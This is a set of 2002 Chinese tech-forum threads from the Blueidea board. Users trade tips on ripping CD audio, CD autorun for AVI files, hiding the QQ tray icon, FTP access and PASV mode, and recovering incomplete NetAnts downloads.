夏禹 初级用户 积分：20 发帖：9 来自：苏 注册：2001-08-05 | 发表于 2002-02-20 11:22:37 按此观看夏禹的个人资料 按此发邮件给夏禹 访问夏禹的主页 夏禹 的 oicq 是6263801,查看 6263801 的资料 收藏该主题供以后查看 发送悄悄话给夏禹 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看夏禹的IP 为何从CD光盘中拷下来的歌无法在电脑中用播放器播放？这是什么原因。。。 如果一切都不能改变，至少我还能改变我的感受； 如果一切都不能控制，至少我还能控制我的风度；
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-02-20 11:32:20 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 转成MP3或WMA 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
dancing 叶恨花 现任版主 积分：4737 发帖：2230 来自：|二进制情感天空| 注册：2000-12-11 | 发表于 2002-02-20 11:39:55 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP 要么你拷下来的歌虽然很大，但能放，比如超级解霸，要么你拷下来的歌很小，那是音轨的格式问题，不能播放，不过压缩一下多好，省地方啊。 情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… … Blueidea Web Team Moderator Of Photoshop & Imagerady Forum
piety 终级用户 积分：737 发帖：210 来自：www.piccool. 注册：2001-09-03 | 发表于 2002-02-20 14:54:36 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP 要用专用的软件抓音轨，抓下来之后最好转成什么格式别的格式的，要求不高MP3就能对付听 人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
imacwei 终级用户 积分：2344 发帖：1077 来自：China.Jiangs 注册：2001-07-23 | 发表于 2002-02-20 16:23:29 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP 呵呵……CD上的音乐是刻在音轨上的，要用专门的工具！ Loading………… WINDOWS2000-SP2+IE5.5 FIREWORKS,the solution for professional Web graphic design and production. Press Anykey To Continue… iMacWei
啸 无意 现任版主 积分：6225 发帖：2154 来自： 注册：2000-08-01 | 发表于 2002-02-20 16:38:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 建议以后不要直接拷了，不好播，又占空间。可以用windows的媒体播放器录成wma格式的，很省空间，一张cd根据你选的压缩比可以压在20-80M之间，而你直接拷要600多兆！ 如果你懒得录，也不想找特殊的播放器，最简单的播放方法是把cd放进光驱里，然后把音响接到光驱的耳机口上，按光驱的play键就可以了，不占cpu，很省资源。 宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒...... Blueidea Web Team. Moderator Of Computer Technology Forum
piety 终级用户 积分：737 发帖：210 来自：www.piccool. 注册：2001-09-03 | 发表于 2002-02-20 18:13:18 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP 偶就是直接光驱PLAY键听，反正也不是什么好光驱，听坏了就坏了，不过要是光驱面板上没有PLAY键的就没这么爽了 人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
夏禹 初级用户 积分：20 发帖：9 来自：苏 注册：2001-08-05 | 发表于 2002-02-20 20:23:10 按此观看夏禹的个人资料 按此发邮件给夏禹 访问夏禹的主页 夏禹 的 oicq 是6263801,查看 6263801 的资料 发送悄悄话给夏禹 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看夏禹的IP 谢谢大家 如果一切都不能改变，至少我还能改变我的感受； 如果一切都不能控制，至少我还能控制我的风度；
JILL 终级用户 积分：590 发帖：180 来自：沈阳市 注册：2001-12-10 | 发表于 2002-02-20 20:48:54 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP 把CD压成MP3。 用超级解霸 音频工具 MP3数字抓轨 誓与WIN2000共存
上一贴 | 下一贴
快速回复 主题：为何听不了CD音乐？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


如何自动运行AVI文件？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
如何自动运行AVI文件？

上一贴 | 下一贴
发表人 | 主题: 如何自动运行AVI文件？
bjSun 初级用户 积分：78 发帖：34 来自：中国北京 注册：2001-09-14 | 发表于 2002-03-12 10:12:35 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP 1、为什么我制作完成的AVI，在有些电脑上能用Media Player看到图像，而有些就不可以，怎么能让所有的电脑都能看到图像？是缺少插件吗？ 2、我在光盘里刻录了一个AVI文件，我想在光盘放入光驱时，自动运行这个AVI文件，可以吗？ Sun
wx@ay 看不懂 积分：7424 发帖：5353 来自：ay.ha.cn 注册：1999-12-23 | 发表于 2002-03-12 10:54:07 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 1、可能对方的MEDIA PLAYER版本低。如果是7.1以上版本应该没问题。 或者对方AVI文件的关联不是使用MEDIA PLAYER，而是使用REAL PLAYER或QUICKTIME也有可能。 2、光盘自动运行需要在光盘根目录加入AUTORUN.INI文件，一般写法为： [autorun] //表示autorun部分开始 icon=shell32.dll,13 //表示图表文件的位置 open=*.exe //表示自动运行文件的位置。 但是你要运行的是AVI文件，可能需要加入其它设置的 。就要看你的AUTORUN文件的编写了 Think like a Genius. 有些爱情象指甲，有些象牙齿。 指甲能不断生长，不要的就剪掉。 而牙齿就不同。 象牙齿的爱情会不同，它会永远！ 小心蛀牙！！！
云舒 超级用户 积分：445 发帖：439 来自：经典 注册：2001-11-01 | 发表于 2002-03-12 16:32:24 按此观看云舒的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给云舒 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看云舒的IP 与Windows Media Player的版本和电脑设置有关。 右键点击该文件，选取打开方式为Windows Media Player
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-03-12 19:26:44 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 1是插件问题，好像要装一个DIX4。1BA吧！ 我记得现在这个是最新的！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
上一贴 | 下一贴
快速回复 主题：如何自动运行AVI文件？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


有没有把QQ图标从任务栏上隐藏的工具？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
有没有把QQ图标从任务栏上隐藏的工具？

上一贴 | 下一贴
发表人 主题: 有没有把QQ图标从任务栏上隐藏的工具？
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2002-01-25 09:41:53 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
好让boss看不见

对了，我的操作系统是2k server

[这消息被菜菜子编辑过(编辑时间2002-01-25 09:42:35)]

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-25 13:03:18 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
打开“QQ参数设置”对话框，在“参数设置”选项卡中消除“在任务栏显示图标”复选框，确定后托盘中的小企鹅图标立刻就消失了 预先在设置中设好呼出QQ的快捷键

老板就只知道你在认真工作了

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-25 13:27:41 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
如果还想隐藏其它的东东，推荐你使用Effective Desktop

http://nj.onlinedown.net/EFFECTIVEDESKTOP.HTM

Effective Desktop是一个用来加强Windows桌面操作的工具组，它结合了工具栏列、系统区、开始菜单及桌面管理功能，不但让桌面看起来更清爽，而且使用上更有效率。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-25 13:35:18 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
你说的方法是高版本的QQ吧!

当windows出现非法操作时,任务栏也会隐藏QQ图标

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

kacji

终级用户
积分：1014
发帖：299
来自：活火熔城
注册：2001-08-14
 发表于 2002-01-25 14:07:25 按此观看kacji的个人资料 按此发邮件给kacji kacji 的 oicq 是156679,查看 156679 的资料 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP
1. 使用BOSSKEY，搜得到的。
2。把EXPLORER进程结束掉，再运行一个，等桌面再恢复后，就看不见小企鹅了。:-)

我要让这天，再遮不住我眼
我要让这地，再埋不了我心
我要让众生，都明白我意
我要让诸佛，皆烟消云散
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-01-25 14:09:46 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
xp 直接支持控制任务栏上哪些图标显示和隐藏

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-01-25 14:13:15 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
根本就不用工具阿！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
薄荷

初级用户
积分：114
发帖：35
来自：
注册：2000-11-04
 发表于 2002-01-25 14:19:12 按此观看薄荷的个人资料 按此发邮件给薄荷 访问薄荷的主页 薄荷 的 oicq 是123879,查看 123879 的资料 发送悄悄话给薄荷 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看薄荷的IP
Effective Desktop棒极了
谢了2smile：）
wangfeng

超级用户
积分：330
发帖：102
来自：辽宁
注册：2001-12-23
 发表于 2002-01-25 17:38:03 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
打开“QQ参数设置”对话框，在“参数设置”选项卡中消除“在任务栏显示图标”复选框，确定后托盘中的小企鹅图标立刻就消失了 预先在设置中设好呼出QQ的快捷键

然后就要靠心灵感应 或者 戴上耳机了

我曾经问个不休？………………………………………………？
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2002-01-27 21:19:18 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
Wonderful！！！
Great！！！

THANKS！

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-01-27 21:25:52 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

有时候进行依次无害的非法操作会让任务栏里的正在运行的程序的图标都消失 ~

ps： 用用 winstep 如何 ~

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
cloudy

cloudy
积分：1290
发帖：620
来自：天空
注册：2000-11-03
 发表于 2002-01-27 21:34:17 按此观看cloudy的个人资料 按此发邮件给cloudy 访问cloudy的主页 cloudy 的 oicq 是8501397,查看 8501397 的资料 发送悄悄话给cloudy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloudy的IP
ft.用得着那么麻烦嘛。

把qq最小化，然后把任务条给缩小了不就的了。程序间用键切换的了。咔咔

飞云阁 Ver4.0 other Version

飞云阁Ver3.0 Now

瀚烟穷 层层叠叠凌云峰 乾坤展 斑斑驳驳色正浓

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-01-27 22:07:40 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
cloudy在上个帖子中说
引用:
ft.用得着那么麻烦嘛。

把qq最小化，然后把任务条给缩小了不就的了。程序间用键切换的了。咔咔

扑通 ·

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2002-01-27 23:00:35 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
中文名称：虚拟桌面
英文名称：MoreWindows
V1.0.67版，PWin95/98平台，49K（压缩后为19K），完成于1998年5月30日，自由软件。

软件介绍：
一个可以开9个虚拟桌面的程序，通过快捷键(Ctrl+F1~F9)切换，还可以给每个桌面设置不同的墙纸。使用VB编写，需要VB5.0运行库。

因为先天性的对系统底层功能支持不足，所以曾经一度想放弃VB，后来发现了API这个好东西，如获至宝，就写了这个小工具（谁说VB不能进行底层开发！）。

本软件为自由软件，如果有兴趣的话，可以与我EMAIL联系，索要源代码。

作者：许小松

下载地址：
http://202.100.116.12/paddy/down/morewindows.zip 19K

经试验，该软件完全可以在 Windows 2000 下运行，哈哈，这回好了，以后有人来时不用手忙脚乱的关窗口了，只要按一下 CTRL + F? 切换到其他桌面就行了。等对方走后再切换回来，呵呵……

小心者,心小也!
上一贴 | 下一贴
快速回复 主题：有没有把QQ图标从任务栏上隐藏的工具？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何通过HTTP上FTP？急！！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何通过HTTP上FTP？急！！！

上一贴 | 下一贴
发表人 | 主题: 如何通过HTTP上FTP？急！！！
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-01-17 20:43:53 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 收藏该主题供以后查看 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 没有ftp端口…… 记得以前有一种软件可以通过HTTP协议上FTP，有谁知道？ 什么名字？哪位大虾指教！ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
51windows 海娃 积分：4495 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-01-17 23:14:00 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 在游览器地址栏输入ftp://ftp地址， 然后提示你输入用户名，密码 ..(不要脱机) 就可以了！上传下载，新建文件夹，改名操作.... Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
火鸟王 终级用户 积分：473 发帖：275 来自：盈动数码 注册：2000-08-22 | 发表于 2002-01-18 09:18:26 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP http://www.ydsm.com/bbs/cgi-bin/topic.cgi?forum=6&topic=60 千淘万漉虽辛苦，吹尽狂沙始到金。
cola 终级用户 积分：1333 发帖：829 来自： 注册：2000-02-27 | 发表于 2002-01-18 10:19:04 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP 这个好象和具体的服务器也有关系，flashget有个站点资源探索器，不错。 It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
arrive 终级用户 积分：1298 发帖：433 来自：大连 注册：2000-12-02 | 发表于 2002-01-18 12:04:34 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP HTTP to FTP Нельзя выпустить из руквозможностъ,которая случается в жизнь. 中国坛中文网——网络技术版www.chinafen.com
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-18 21:18:17 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent Socks2HTTP http://dzc.126.com/
上一贴 | 下一贴
快速回复 主题：如何通过HTTP上FTP？急！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


关于下载的问题 - 经 典 论 坛

计算机技术
关于下载的问题

上一贴 | 下一贴
发表人 主题: 关于下载的问题
／一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-02-02 04:26:38 按此观看／一般拉傻的个人资料 按此发邮件给／一般拉傻 访问／一般拉傻的主页 ／一般拉傻 的 oicq 是13624892,查看 13624892 的资料 收藏该主题供以后查看 发送悄悄话给／一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看／一般拉傻的IP
用网络蚂蚁下了一个东西，下完了，100%，但图标还是蚂蚁，后缀rar，无法解压

有人知道怎么办吗？

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
kurtf

高级用户
积分：186
发帖：53
来自：
注册：2002-01-10
 发表于 2002-02-02 08:56:46 按此观看kurtf的个人资料 按此发邮件给kurtf 发送悄悄话给kurtf 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kurtf的IP
用WinRAR解压！
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-02-02 09:54:36 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
图标还是蚂蚁的话,应该还没下完啊.如果没装WINRAR系统是不会认识.RAR文件的.
用蚂蚁的修复功能试试.

UFO Bulletin Board ====> 不明飞行物
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-02 10:53:06 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
曾经遇到过类似情况，在Netant中明明显示下载完成，但到下载目录一看，仍旧是蚂蚁，直接点击是不行，只好试着用右键或相关程序打开，却没问题，等重启一次就没问题了，不知道你的情况是不是也差不多。

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

／一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-02-02 15:35:51 按此观看／一般拉傻的个人资料 按此发邮件给／一般拉傻 访问／一般拉傻的主页 ／一般拉傻 的 oicq 是13624892,查看 13624892 的资料 发送悄悄话给／一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看／一般拉傻的IP
重启无法解决，

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
sunjune

初级用户
积分：113
发帖：29
来自：
注册：2002-02-01
 发表于 2002-02-04 13:22:27 按此观看sunjune的个人资料 按此发邮件给sunjune sunjune 的 oicq 是1871284,查看 1871284 的资料 发送悄悄话给sunjune 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunjune的IP
图标是蚂蚁，后缀是.rar，不对吧，把你的文件夹选项中的“隐藏已知类型文件扩展名”去掉再看看，应该是还没正常下载完吧。
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-04 17:35:33 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
在 DOS 状态下 , 使用REN 命令 , 把文件后缀名改为下载文件的后缀名, 返回后点击文件,你会发现 ......
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-04 22:00:40 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
话草在上个帖子中说
引用:
在 DOS 状态下 , 使用REN 命令 , 把文件后缀名改为下载文件的后缀名, 返回后点击文件,你会发现 ......

如果我没记错的话，用蚂蚁下载的这种东东的真正的文件后缀是 .!!! 才对，话草说的方法是对的，你可以试试，我以前就是这么用的。
造成这种情况的原因有很多，1是当文件快下完的时候网速有点慢，2是当蚂蚁刚显示下载完毕时你就推出了，或是掉线了，但是因为蚂蚁是5点一起下载，文件刚下完时还没有把5个部分组合在一起。这是最主要的两个原因。你可以到DOS下改名
X:\ren xxx.rar.!!! xxx.rar
这样就一切OK了！！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

上一贴 | 下一贴
快速回复 主题：关于下载的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


关于FTP的问题 - 经 典 论 坛

计算机技术
关于FTP的问题

上一贴 | 下一贴
发表人 主题: 关于FTP的问题
不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-12 17:53:08 按此观看不知道的个人资料 按此发邮件给不知道 收藏该主题供以后查看 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
FTP中的PASV选项是什么意思？设和不设有什么区别？英文全称怎么写？

知之为知之，不知为不知！！
virchow

终级用户
积分：782
发帖：300
来自：广州
注册：2001-08-05
 发表于 2002-03-12 18:09:55 按此观看virchow的个人资料 按此发邮件给virchow virchow 的 oicq 是5963744,查看 5963744 的资料 发送悄悄话给virchow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看virchow的IP
一般都不用设

| _ 绝 _ 对 _ 绿 _ 色 _ |
| _ 绝 _ 对 _ 经 _ 典 _ |
| _ 如 _ 果 _ 我 _ 是 _ 只 _ 小 _ 蜜 _ 蜂 _ |
_______ | 绝 | 对 | 至 | 爱 | 就 | 是 | 自 | 然 | 的 | 色 | 彩 |

不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-12 22:06:37 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
CuteFTP上传文件时，在站点属性中USE PASV MODE是打对钩的。我不知道这种模式是什么意思。
知道为什么对我很重要，关系到FireWALL的设置。

知之为知之，不知为不知！！
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-03-12 23:49:36 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
指定服务器数据传输过程监听等待客户端的数据连接连接建立请求

